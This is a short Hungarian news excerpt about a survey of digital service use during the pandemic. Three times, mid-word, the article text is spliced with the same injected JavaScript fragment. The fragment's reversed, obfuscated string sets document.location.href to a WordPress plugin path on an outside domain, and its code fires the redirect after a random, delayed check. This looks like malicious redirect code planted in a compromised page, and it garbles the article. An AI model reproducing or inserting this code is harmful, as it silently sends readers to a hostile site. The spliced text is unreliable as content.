A nemzetközi tanácsadó cég reprezentatív felméréséből kiderül, hogy a magyarok háromnegyede használt legalább egy digitális szolgáltatást a kijárási korlátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozások alatt, ami 21 százalékpontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos emelkedés a járvány előtti időszakhoz viszonyítva. A járvány előtt egy ember általában egy digitális szolgáltatást használt, utána viszont átlagosan hármat-négyet. Az adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok szerint leginkább a banki és a telekommunikációs szolgáltatások bővültek: előbbieket a megkérdezettek több mint fele, a megkérdezettek 57 százaléka vett igénybe, és 36 százalék vált aktív felhasználóvá a járvány alatt. Telekommunikációs szolgáltatást 47 százalék intézett online, és 32 százalék lett aktív a kritikus hónapokban. A McKinsey digitális szakértője a bankok és telekommunikációs cégek vezető szerepét…
A cikk folytatódik: http://telekomesit.co.hu/cikk/id/egy_felmeres_szerint_fellenditette_a_jarvany_a_digitalis_szolgaltatasok_hasznalatat_210720
- Hirdetés -